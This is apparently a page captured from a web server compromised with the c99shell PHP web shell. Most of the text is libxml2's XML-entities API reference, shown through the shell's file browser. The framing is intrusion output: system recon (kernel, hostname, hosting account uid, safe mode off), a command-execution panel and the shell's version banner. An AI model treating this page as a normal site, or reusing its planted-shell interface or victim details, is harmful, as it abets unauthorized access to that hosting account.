Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /opt/alt/libxml2/usr/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
entitiesentities - interface for the XML entities handling this module provides some of the entity API needed for the parser and applications. Author(s): Daniel Veillard Synopsistypedef struct _xmlHashTable xmlEntitiesTable; typedef xmlEntitiesTable * xmlEntitiesTablePtr; typedef enum xmlEntityType; xmlEntityPtr xmlAddDocEntity (xmlDocPtr doc, DescriptionDetailsStructure xmlEntitiesTablestruct _xmlHashTable { The content of this structure is not made public by the API. } xmlEntitiesTable; Typedef xmlEntitiesTablePtrxmlEntitiesTable * xmlEntitiesTablePtr; Enum xmlEntityTypeenum xmlEntityType { XML_INTERNAL_GENERAL_ENTITY = 1 XML_EXTERNAL_GENERAL_PARSED_ENTITY = 2 XML_EXTERNAL_GENERAL_UNPARSED_ENTITY = 3 XML_INTERNAL_PARAMETER_ENTITY = 4 XML_EXTERNAL_PARAMETER_ENTITY = 5 XML_INTERNAL_PREDEFINED_ENTITY = 6 }; xmlAddDocEntity ()xmlEntityPtr xmlAddDocEntity (xmlDocPtr doc, Register a new entity for this document.
xmlAddDtdEntity ()xmlEntityPtr xmlAddDtdEntity (xmlDocPtr doc, Register a new entity for this document DTD external subset.
xmlCleanupPredefinedEntities ()void xmlCleanupPredefinedEntities (void) Cleanup up the predefined entities table. Deprecated call xmlCopyEntitiesTable ()xmlEntitiesTablePtr xmlCopyEntitiesTable (xmlEntitiesTablePtr table) Build a copy of an entity table.
xmlCreateEntitiesTable ()xmlEntitiesTablePtr xmlCreateEntitiesTable (void) create and initialize an empty entities hash table. This really doesn't make sense and should be deprecated
xmlDumpEntitiesTable ()void xmlDumpEntitiesTable (xmlBufferPtr buf, This will dump the content of the entity table as an XML DTD definition
xmlDumpEntityDecl ()void xmlDumpEntityDecl (xmlBufferPtr buf, This will dump the content of the entity table as an XML DTD definition
xmlEncodeEntities ()const xmlChar * xmlEncodeEntities (xmlDocPtr doc, TODO: remove xmlEncodeEntities, once we are not afraid of breaking binary compatibility People must migrate their code to xmlEncodeEntitiesReentrant ! This routine will issue a warning when encountered.
xmlEncodeEntitiesReentrant ()xmlChar * xmlEncodeEntitiesReentrant (xmlDocPtr doc, Do a global encoding of a string, replacing the predefined entities and non ASCII values with their entities and CharRef counterparts. Contrary to xmlEncodeEntities, this routine is reentrant, and result must be deallocated.
xmlEncodeSpecialChars ()xmlChar * xmlEncodeSpecialChars (const xmlDoc * doc, Do a global encoding of a string, replacing the predefined entities this routine is reentrant, and result must be deallocated.
xmlFreeEntitiesTable ()void xmlFreeEntitiesTable (xmlEntitiesTablePtr table) Deallocate the memory used by an entities hash table.
xmlGetDocEntity ()xmlEntityPtr xmlGetDocEntity (const xmlDoc * doc, Do an entity lookup in the document entity hash table and
xmlGetDtdEntity ()xmlEntityPtr xmlGetDtdEntity (xmlDocPtr doc, Do an entity lookup in the DTD entity hash table and
xmlGetParameterEntity ()xmlEntityPtr xmlGetParameterEntity (xmlDocPtr doc, Do an entity lookup in the internal and external subsets and
xmlGetPredefinedEntity ()xmlEntityPtr xmlGetPredefinedEntity (const xmlChar * name) Check whether this name is an predefined entity.
xmlInitializePredefinedEntities ()void xmlInitializePredefinedEntities (void) Set up the predefined entities. Deprecated call xmlNewEntity ()xmlEntityPtr xmlNewEntity (xmlDocPtr doc, Create a new entity, this differs from xmlAddDocEntity() that if the document is NULL or has no internal subset defined, then an unlinked entity structure will be returned, it is then the responsibility of the caller to link it to the document later or free it when not needed anymore.
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0913 ]-- |